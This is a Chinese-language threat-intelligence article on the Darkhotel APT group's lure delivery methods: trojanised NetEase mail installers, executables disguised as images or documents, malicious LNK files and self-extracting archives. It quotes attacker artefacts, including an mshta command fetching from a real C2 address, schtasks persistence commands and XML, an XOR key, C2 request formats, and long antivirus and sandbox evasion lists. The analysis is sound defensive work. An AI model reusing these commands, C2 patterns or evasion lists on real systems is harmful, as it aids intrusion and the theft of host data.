APT GROUP系列——DARKHOTEL之誘餌投遞篇
2020-07-29伏影實驗室APT 團夥, Darkhotel, 檔案僞裝
閱讀: 593
一、Darkhotel組織簡介
Darkhotel是一個活躍近10年的APT組織,于2014年被卡巴斯基披露,最早可追溯到2010年。該組織因針對入住高檔酒店的商貿高管和國家政要而得名,攻擊目标範圍涉及中國、北韓、日本、緬甸、印度以及少數歐洲國家。該組織有寄生獸、Dubnium、Nemim、Tapaoux、APT-C-06和T-APT-02等多個别名,并被認為具有北韓半島國家背景。
Darkhotel組織的攻擊特色是通過入侵一些高檔酒店的網絡系統,掌控酒店WIFI,使用社會工程學手段,對登陸WIFI的目标發送僞造的提示,誘使其下載下傳指定工具并更新,向目标主機植入惡意後門。由于攻擊者控制了WIFI,且對目标的姓名、來去時間和房間号了如指掌,使得目标處于半監視環境中而不自知。近年來,該組織多次僞裝正常軟體包發動水坑攻擊。
此外,Darkhotel也使用釣魚攻擊。攻擊者向企業高管和國家政要發送郵件,其主題經過精心設計,與行業政策态勢或者政治熱點問題密切相關,附件中則包含構造的惡意檔案。這些檔案多為快捷方式、自解壓檔案或攜帶0day漏洞的文檔,待目标打開運作即觸發惡意行為。
Darkhotel使用過的木馬工具形式多樣,既包括傳統的遠控木馬、間諜軟體和更新下載下傳器,也包含獨具特色檔案的感染元件等。前者用于竊取使用者敏感資訊,而後者則被用于打破隔離網絡下的限制,進行更大範圍的攻擊。
上述特征使得Darkhotel成為極其危險的活躍APT組織,需要引起相關行業的高度重視。
二、誘餌投遞
2.1 手法簡述
Darkhotel投遞的誘餌主要分為3種類型:
- 帶漏洞的文檔
- 帶後門的工具/安裝包僞裝的文檔
- 僞裝的文檔
漏洞文檔是APT組織常用的攻擊載荷之一。例如在2014年,該組織就利用過當年的Adobe 0day漏洞CVE-2014-0497,對我國若幹特定郵箱使用者發起定向攻擊。在2015年,該組織利用了當年的0day漏洞CVE-2015-8651。攻擊者發送釣魚郵件,包含了嵌入惡意swf連結Word文檔,通過shellcode下載下傳執行後續的惡意程式。此後,該組織被爆出繼續使用其他漏洞發起攻擊,涉及CVE-2017-11882、CVE-2018-8174和CVE-2018-8373等。這些攻擊中的0day利用表明該組織始終保持着對傳統PC漏洞的高關注度。
而對于後兩種類型,攻擊過程中會釋放惡意程式或檔案,同時安裝正常軟體或打開正常檔案以掩蓋惡意行為,故能夠欺騙目标。在這方面,Darkhotel可謂劣迹昭着。
早在2014年,該組織就在數個酒店發起水坑攻擊,要求目标更新Adobe Flash,Google Toolbar與Windows Messenger等工具,實則插入了後門。該組織還曾在日本p2p網絡上釋出關于成人内容的種子,并提供壓縮包解密工具,最終釋放出惡意程式。無論是僞造官方安裝還是利用人的需求,Darkhotel都成功騙取了目标的信任。
Darkhotel也曾誘使目标點選執行僞裝成圖檔或文檔的可執行檔案或惡意快捷方式(Lnk),以展開後續活動。與漏洞相比,這種方式成本較低且不受Windows版本平台限制。
2.2 污染的軟體更新/安裝包
2.2.1 網易郵箱“大師”
2019年,Darkhotel被爆出發起了針對中國外貿易企業高管的攻擊[]。攻擊者僞造了網易雲郵箱大師安裝包,在釋放了正常的郵箱大師的同時會下載下傳并加載惡意Dll,用來下載下傳安裝後續惡意程式。
該dll元件有兩大特點,一是在調用自身某些函數時并非直接調用,而是通過rundll32.exe另起一個程序;二是會根據加載自身程序的不同而産生不同的行為。
Dll會檢測加載自身的程序,分别為winword.exe、powershell.exe和searchIndexer.exe。這可以兼顧Dll注入,也以分别兼顧Word漏洞利用或僞裝文檔、powershell下載下傳執行元件和劫持wsearch服務這三種情況。
若自身程序為winword.exe,則使用rundll32.exe加載自身并調用函數lame。在lame函數中,首先會檢測lame.dll是否存在,如果不存在則退出。如果lame.dll存在會再次檢測是否存在寫死的殺軟産品程序:
360tray.exe、ZhuDingFangYu.exe、QHSafeTray.exe、QHActiveDefense.exeAvastUI.exe、avgui.exe
若上述程序之一存在,則再次下載下傳lame.dll,并将其複制到System32目錄下重命名為msTracer.dll,并設定wsearch服務自啟動。wsearch服務會運作searchIndexer.exe,後者會加載msTracer.dll,是以實作了劫持。
如果不存在上述殺軟,則使用rundll32.exe加載自身并調用lame3函數,通過修改系統資料庫增加服務LameSvc實作lame.dll開機自啟動。
| 服務名稱 | LameSvc |
| 顯示名稱 | LAME MP3 Encoder Service |
| 可執行檔案路徑 | %SystemRoot%\\System32\\svchost.exe -k lamesvc |
若加載自身的程序是SearchIndexer.exe,則建立SearchProtocolHost.exe程序。該程序同樣會加載上文提到的msTracer.dll,形成劫持。
若加載自身程序為powershell.exe,則擷取本機資訊,包括計算機名、使用者名、程序清單等資訊,然後檢測指定目錄下lame.dll是否存在,沒有則下載下傳,有則退出程式。
2.3 檔案僞裝
2.3.1 EXE僞裝成圖檔
2015年的一起攻擊事件中,Darkhotel将可執行檔案僞裝成圖檔誘使目标點選。
可執行檔案名為congratulation_rcs.jpg,實際為添加了RLO字元的congratulation_gpj.scr。該可執行檔案運作後将正常圖檔congratulation_rcs.jpg釋放到目錄AppData\Roaming下,然後打開圖檔。該圖檔會替換僞裝的可執行檔案,不過這樣會造成螢幕畫面閃動,可能引人懷疑。圖檔中包含幾行北韓文,大意是節日祝福與對未來的願景,結尾處文字疑似為某國上司人的落款。
接着PE在AppData\Roaming\Microsoft檔案夾下建立一個隐藏的mspaint2.lnk的快捷方式并打開。之後會并删除之前的scr檔案和bat檔案,使得目錄下隻能看到圖檔。
此處的lnk作為中間元件,包含惡意腳本,功能是下載下傳第二階段的JS腳本。
第二階段腳本會下載下傳可執行檔案,儲存于%temp%檔案夾下并随即執行,同時删除之前的JS。
2.3.2 Lnk僞裝成文檔
2016年一起攻擊事件中,Darkhotel将惡意lnk僞裝成doc文檔圖示,通過固定的指令行來下載下傳可執行檔案:
該指令行指定下載下傳連接配接,并将檔案儲存為dwm.exe來執行。Dwm.exe是具有一定僞裝的Dropper程式,與Windows桌面管理器元件同名,運作後會釋放僞裝的文檔以欺騙目标,使之以為自己打開的确實是文檔。
該lnk社工檔案最終釋放的載荷是名為xxxx21.exe的下載下傳器,與2015年攜帶Adobe漏洞swf的文檔釋放出的程式相同。下載下傳器會連接配接指定C&C,下載下傳最終階段木馬程式并将其注入windows程序運作。
該程式會檢測沙箱、虛拟機以及大量與安全程式相關的程序、系統資料庫以及指定字元串等内容。檢測的沙箱包括:
VirtuBox, VMware, Sandbox, BSA, Cuckoo
殺軟程序名包括:
- 卡巴斯基
avp.exe avpui.exe
- McAfee
mcagent.exe McNASvc.exe MpfSrv.exe McProxy.exe mcmscsvc.exe McUICnt.exe McAPExe.exe mfefire.exe McCSPServiceHost.exe mcshield.exe mfevtps.exe McSvHost.exe McVulCtr.exe
- 趨勢科技
uiWatchDog.exe uiseagnt.exe ufseagnt.exe uiwinmgr.exe coreserviceshell.exe coreframeworkhost.exe
- 360
ZhuDongFangYu.exe 360tray.exe 360sd.exe 360rp.exe qhsafetray.exe qhwatchdog.exe qhactivedefense.exe
- ALYac
ayagent.aye ayrtsrv.aye ayupdsrv.aye
- AntiVir
avguard.exe avgnt.exe avcenter.exe
- 諾頓
ccsvchst.exe nis.exe ns.exe
- AVG
avgtray.exe avgui.exe avgidsagent.exe avgwdsvc.exe avgrsa.exe avgcsrva.exe avgcsrvx.exe
- Avast
afwServ.exe avastui.exe avastsvc.exe
- 微軟
msseces.exe msmpeng.exe nissrv.exe
- Eset NOD32
egui.exe ekrn.exe
- AdAwareInstaller
AdAwareDesktop.exe AdAwareService.exe AdAwareTray.exe AdAwareUpdater.exe
- 百度
BHipsSvc.exe bavhm.exe BavSvc.exe BavTray.exe BavUpdater.exe Bav.exe BaiduHips.exe BaiduSdTray.exe BaiduSdSvc.exe
- BitDefender
bdagent.exe bdwtxag.exe
- 金山毒霸
kxetray.exe kxescore.exe
- Comodo
CisTray.exe cavwp.exe cmdagent.exe cis.exe cmdupd.exe
- Malwarebytes
mbam.exe mbamscheduler.exe mbamservice.exe
- Panda
PSUAMain.exe PSUAService.exe PSANHost.exe
- Dr.Web
dwscanner.exe dwengine.exe dwarkdaemon.exe dwnetfilter.exe dwservice.exe
- 瑞星
RsMgrSvc.exe RavMonD.exe RavMonD.exe RsTray.exe
- 騰訊
QQPCRTP.exe QQPCTray.exe
- K7TotalSecurity
K7TSHlpr.exe K7TSMain.exe K7TSMngr.exe K7TSecurity.exe K7CrvSvc.exe K7EmlPxy.exe K7CTScan.exe K7SysMon.Exe K7FWSrvc.exe K7PSSrvc.exe
- 其他
a2guard.exe a2service.exe avk.exe avktray.exe avas.exe tptray.exe fsma32.exe fsorsp.exe econser.exe escanmon.exe pctsSvc.exe pctsGui.exe casc.exe umxengine.exe nsesvc.exe cclaw.exe v3svc.exe guardxup.exe fprottray.exe vba32ldr.exe
該程式的主要運作參數通過解密配置資訊得到,會在以下位置擷取加密的配置資訊:
- 程式運作目錄下的.mul字尾檔案内;
- 程式本體記憶體的0x4DBC90~0x4DC408處。
使用的解密算法為異或,異或Key為34 61 61 5E 61 0F 32 5E 53 54。
從解密後的配置資訊中獲得C&C位址,并使用白名單程式mshta下載下傳檔案。連接配接會包含程式生成的一串由大小寫字母組成的ID号。
C:\Windows\system32\mshta.exe "http://top-163.com/docu99/set.php?id_str" 由于mshata本身不能指定下載下傳檔案的本地儲存路徑,故該程式對mshta程序進行監控,使用NtQueryObject擷取mshta中對象的名稱資訊,以獲得mshta生成的緩存檔案的路徑。
程式嘗試将檔案注入到指定windows程序中。首先嘗試注入預設浏覽器,若注入不成功,嘗試在固定程序清單中找到程式執行注入。針對不同環境,程式有以下注入目标:
plasrv.exe;wksprt.exe;raserver.exe;mshta.exe;taskhost.exe;dwm.exe;sdiagnhost.exe;winrshost.exe;wsmprovhost.exe;
ctfmon.exe;mshta.exe;explorer.exe;
dwm.exe;sidebar.exe;mshta.exe;taskeng.exe;MSASCui.exe;ctfmon.exe;explorer.exe;wksprt.exe;ctfmon.exe;mshta.exe;explorer.exe;
2.3.3 Lnk直接點選
在2019年一起針對日本相關組織的攻擊事件中,釣魚郵件誘導目标從雲伺服器下載下傳并執行惡意Lnk。Lnk會利用白名單工具mshta下載下傳包含VBScript的html檔案,運作該VBScript會建立并運作VBS檔案(stwa,vbs)和BAT檔案(Autorun.bat)。
VBS腳本的作用是解碼lnk中的Base64資料,生成CAB自解壓包,運作其中的子產品化元件,包括下載下傳器、檔案複制器的xml注冊工具等。
| srdfqm.exe | 下載下傳器 |
| cp_cdis32.exe | 複制srdfqm.exe到%APPDATA%microsoft目錄下 |
| sd.exe | 對任務檔案winpt.xml和winpt_n.xml檔案進行注冊 |
使用如下指令注冊xml為任務:
schtasks.exe /create /tn WinpcapUpdt /xml winpt.xml
schtasks.exe /create /tn WinPcapUpdt_n /xml winpt_n.xml 其中的winpt.xml和winpt_n.xml部分内容分别如下所示:
<?xml version="1.0" encoding="UTF-16"?>
……..
……..
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec id="tte243">
<Command>%appdata%\Microsoft\Network\lqm_gt.exe</Command>
<WorkingDirectory>%appdata%\Microsoft\Network</WorkingDirectory>
</Exec>
</Actions>
</Task> <?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
….
….
</Settings>
<Actions Context="Author">
<Exec id="tte243">
<Command>%appdata%\Microsoft\Network\lqm_gt.exe</Command>
<WorkingDirectory>%appdata%\Microsoft\Network</WorkingDirectory>
</Exec>
</Actions>
</Task> 建立任務是WinpcapUpdt和WinPcapUpdt_n,用于執行其他元件
2.3.4 自解壓檔案僞裝成文檔
在2016年一次攻擊事件中,Darkhotel在釣魚郵件中使用了僞裝成文檔的自解壓檔案,名為winword.exe。與上文3例同理,該檔案一旦運作,除了釋放真正的文檔外還會執行下載下傳行為。下載下傳行為分為了多個階段,以試圖繞過安全監測。
該元件首先将自身複制至自啟動目錄以實作持久性駐留:
C:\Users\%USER%\AppData\Roaming\Microsoft\Windows\Startup 之後,生成記錄主機資訊的腳本并執行。日後在于C2通信過程中,收集的主機資訊會被上傳至C2伺服器。
第一階段,三個步驟與C&C通信:
- 樣本首先使用HTTP GET向C2發送請求,URL為/PHOTO/view2.php?jpg=yahoo_img_src
若C&C回複的内容包含”yahoo_img_src”,則進入一下階段。
- 使用HTTP POST向C&C上傳消息,URL為/PHOTO/view1.php。消息的内容來自本地。行為中生成的臨時檔案,内容為記錄的使用者主機資訊。
- 樣本使用HTTP協定向C2發送請求,方法為GET,URL為:
/PHOTO/view1.php&banner=[BASE64編碼的主機名稱_MAC位址]
C2将第二階段的下載下傳器作為該請求的回複,由樣本儲存至本地并執行。
第二階段的元件使用白名單檔案mshta.exe連接配接C&C下載下傳檔案。該手段與上文所述2016年惡意lnk攻擊鍊中使用mshta的方式一模一樣。
URL指向的資源會被mshta儲存作為臨時檔案儲存至:
AppData\Local\Microsoft\Windows\Temporary Internet Files
同時,mstha作為該檔案的建立者,負責維護該臨時檔案的句柄。當C2回複後,通過函數周遊全局句柄清單,在mshta程序所屬的句柄中,定位負責維護該臨時檔案的句柄。對該臨時檔案的句柄進行讀操作,以擷取C2的回複内容。
與C2的每輪通信中共三個步驟:
- 樣本生成一段32個位元組的随機字元并使用base64編碼,編碼前的格式如圖所示。
編碼完畢後,建構URL向C2端發送GET請求,C2端需回複編碼前的32個随機字元使得通信流程繼續執行。
- 樣本生成一段包含兩個字段的GET請求
第一個字段為’gwe_rd’(Google Font End, redirect),其内容為随機數;
第二個字段為’gfe_rd’(Google Font End, redirect),其内容包括主機名等使用者資訊。
上述字段内容均使用64位編碼。收到請求後,C&C會發送一個長度為四位元組且僅包含數字與字母的字元串作為回應。
- 樣本生成一段包含三個字段的GET請求
第一個字段為’gfe_rd’(Google Font End, redirect),其内容包括主機名等使用者資訊,與步驟二相同。
第二個字段為’gwe_rd’(Google Font End, redirect),其内容為随機數與步驟二中C2回複的四位元組字元串組成;上述字段内容均使用64位編碼。
第三個字段為’fbm_hty’, 該字段包含主機中的程序清單密文。C2收到該請求後将加密的可執行惡意載荷傳回至主機。
最終,下載下傳器将最終惡意載荷解密至本地檔案并交由explorer執行。
三、誘餌投遞篇總結
Darkhotel兼具APT組織的慣有特征和自身特色。該組織非常善于對元件進行僞裝,同時釋放出惡意程式與正常檔案,使得目标往往難以察覺背後的存在某種問題或陰謀。該組織極其善于發掘現實中的水坑場所,這暴露了相關行業嚴重的網絡安全缺陷。不管是入侵酒店網絡進行惡意軟體投送,還是通過釣魚郵件投送,都展現出Darkhotel有着極強的對潛在網絡脆弱性的擷取和利用能力。(未完待續)